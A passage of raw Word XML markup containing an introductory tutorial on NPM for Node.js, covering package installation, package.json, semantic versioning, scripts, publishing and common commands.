          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM allows you to install, update, and manage third-party packages or modules that your Node.js project depends on. These packages can range from utility libraries to entire frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59340486" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Version Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E5F5F" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM provides version control for your dependencies, ensuring that your project uses specific versions of packages that are known to work well together. This prevents breaking changes from affecting your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD9F6B" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dependency Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699B8E5" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM handles the resolution of dependencies between packages. If a package requires another package, NPM will automatically install the required dependencies, ensuring everything works correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2256E7AF" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Project Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02EAC7" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM can be used to initialize a Node.js project with a package.json file, which serves as a manifest for the project, detailing its dependencies, scripts, and other metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5DC10" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scripts and Automation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280830C0" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM allows you to define custom scripts in the package.json file to automate tasks like running tests, building code, or starting the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42EE8B" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How NPM Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC63E8F" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Installing NPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5ADBA7"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NPM is installed automatically with Node.js. When you install Node.js, you also get NPM. You can check the installed version of NPM with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D060F"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npm --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE39E1" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Package Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF2AB4"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You can install packages locally (within a project) or globally (available system-wide).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D61D8B"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Local Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Installs the package in the node_modules directory of your project. This is the default behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA98442"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npm install &lt;package-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443C2E6"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Installs the package globally, making it accessible from anywhere on your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A56AE9"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npm install -g &lt;package-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A036175" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>package.json File</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEA63C"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The package.json file is the heart of any Node.js project. It contains metadata about the project, including its name, version, description, main file, scripts, dependencies, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC38BF"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Example package.json:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE4A7E"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6EDC9D4F"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"name": "my-app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BE23A"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"version": "1.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31728EBB"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"description": "A sample Node.js app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA769A"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"main": "index.js",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62049D2D"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"scripts": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660EC021"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"start": "node index.js",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEDAAB2"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"test": "mocha"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA6067"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2F114548"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"dependencies": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BAA48"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"express": "^4.17.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E05ECE"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4A1C5BA"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"devDependencies": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B2F96"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"mocha": "^8.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCD5E1E"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0DA06976"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5DFA8F0F" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Installing Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F1F51"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Running npm install (or simply npm i) in a project directory will install all dependencies listed in the package.json file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267163B5"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By default, dependencies are installed locally under the node_modules directory. If a package-lock.json file is present, NPM will use it to ensure that the exact versions of packages are installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AE534" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Managing Versions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2807DC8D"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NPM uses semantic versioning (semver) to manage package versions. The version format is MAJOR.MINOR.PATCH. For example, "express": "^4.17.1" means that NPM can update to any minor or patch release (e.g., 4.x.x), but not a major release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A4CCD6" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Running Scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D530FBF"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NPM scripts allow you to define custom commands in your package.json. For example, you can run npm start to execute the start script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A05EF9D"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lastRenderedPageBreak/>
        <w:t>npm start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C625A3" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Publishing Packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9EC29F"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If you create a package that you want to share with others, you can publish it to the NPM registry using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3F077" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55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npm publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494CD328" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Before publishing, make sure to set up an NPM account and log in using npm login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D7BC7" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common NPM Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E923764" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install a package</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm install &lt;package-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63D6B5" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install a package globally</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm install -g &lt;package-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6330E6CC" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install all dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6613027D" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Initialize a project</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: npm init or npm init -y (with default settings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02536236" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run a script</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
